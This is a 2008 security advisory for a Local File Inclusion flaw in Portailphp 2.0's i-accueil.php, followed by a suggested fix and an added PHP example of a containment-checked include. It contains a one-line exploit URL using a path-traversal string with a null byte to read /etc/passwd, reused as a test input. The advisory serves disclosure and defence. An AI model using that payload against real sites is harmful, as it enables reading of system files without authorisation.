
portailphp-lfi.txt

Posted on 16 December 2008

[START]

#########################################################################################
[0x01] Information:

Script        : Portailphp 2.0
Download      : http://www.safari-msi.com/portailphp/mod_file/upload/PortailPHP-v2.0.zip
Vulnerability : Local File Inclusion
Author        : Osirys
Contact       : osirys[at]live[dot]it
Website       : http://osirys.org
Notes         : Proud to be Italian
Greets        : XaDoS, x0r, emgent, Jay, str0ke.
Especially to : AlpHaNiX

#########################################################################################
[0x02] Bug: [Local File Inclusion]
######

Bugged file is: /[path]/i-accueil.php

[CODE]
<?php
/* PORTAILPHP */

echo "<table width='100%'><tr><td>";
echo "<img border='0' src='themes/" . $_SESSION["App_Theme"] . "/ico-fleche01.gif' alt=''> &nbsp;Bienvenue sur <strong>$App_Me_Titre</strong><br /><br />" ;
// $chemin is never assigned in this file before it is used as the include prefix
include("$chemin/mod_news/index.php");
echo "</td></tr></table>";
?>
[/CODE]

$chemin is not declared, so we can set its value from GET.

[!] FIX: Just declare $chemin, or don't include it, because it's not necessary.
    i-accueil.php is in the application root (/), like /mod_news/index.php.
    Secure include, anchored to the directory of i-accueil.php:
    include(dirname(__FILE__) . "/mod_news/index.php");

[!] EXPLOIT: /[path]/i-accueil.php?chemin=[local_file_to_include]
             ../../../../../../../../../../../etc/passwd%00

#########################################################################################
[/END]
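
The fix above removes the request-controlled prefix entirely. Where part of an include path does have to vary, the following added example (not code from the advisory or from Portailphp) goes beyond that case and shows a containment check: the base directory is fixed by the application and only an allowlisted module name is accepted. The function safe_module_path() and the temporary directory layout are hypothetical, and all inputs are constructed.

```php
<?php
// Added example (not Portailphp code): resolve an include target against a
// fixed base directory and refuse anything that escapes it.
// safe_module_path() and the temporary directory layout are hypothetical.

function safe_module_path(string $baseDir, string $module): ?string
{
    // Reject NUL bytes outright: older PHP truncated paths at %00.
    if (strpos($module, "\0") !== false) {
        return null;
    }
    // Allowlist the module name format instead of filtering bad sequences.
    if (!preg_match('/\A[a-z0-9_]+\z/', $module)) {
        return null;
    }
    $base = realpath($baseDir);
    $target = realpath($baseDir . '/' . $module . '/index.php');
    if ($base === false || $target === false) {
        return null; // base directory or module file does not exist
    }
    // After symlink resolution the target must still sit under the base.
    if (strncmp($target, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $target;
}

// Constructed layout standing in for the application root.
$root = sys_get_temp_dir() . '/portail_demo_' . getmypid();
mkdir($root . '/mod_news', 0700, true);
file_put_contents($root . '/mod_news/index.php', "<?php echo 'news module';\n");

// Constructed inputs: one legitimate module, the rest hostile or malformed.
$inputs = [
    'mod_news',
    '../../../../../../../../../../../etc/passwd' . "\0",
    '../mod_news',
    'mod_missing',
];
foreach ($inputs as $in) {
    $path = safe_module_path($root, $in);
    printf("%-50s => %s\n", addcslashes($in, "\0"), $path === null ? 'REJECTED' : 'OK');
}

unlink($root . '/mod_news/index.php');
rmdir($root . '/mod_news');
rmdir($root);
```

Only the first input resolves to a path; the traversal string, the relative escape and the nonexistent module are all rejected before anything reaches include().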

 
